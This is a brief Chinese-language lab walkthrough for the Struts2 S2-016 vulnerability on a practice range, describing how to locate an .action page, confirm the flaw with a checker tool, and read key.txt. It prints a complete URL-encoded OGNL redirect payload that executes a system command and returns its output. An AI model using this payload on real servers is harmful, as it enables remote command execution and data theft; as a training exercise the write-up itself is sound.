漏洞描述及影响版本
近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、***居多.
以墨者学院为例
靶场链接::49386
先找出后缀为action的网页,发现:49386/index.action存在,测试漏洞是否存在,可以使用Struts2漏洞检查工具来测试
发现存在Struts2 (s2-016)漏洞,直接使用工具可进行命令执行,直接查看key.txt即可
或者使用payload进行命令执行:
?redirect:%24%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27ls%27%2c%27%2f%27%7d)).start()%2c%23b%3d%23a.getInputStream()%2c%23c%3dnew+java.io.InputStreamReader(%23b)%2c%23d%3dnew+java.io.BufferedReader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23matt.getWriter().println(%23e)%2c%23matt.getWriter().flush()%2c%23matt.getWriter().close()%7d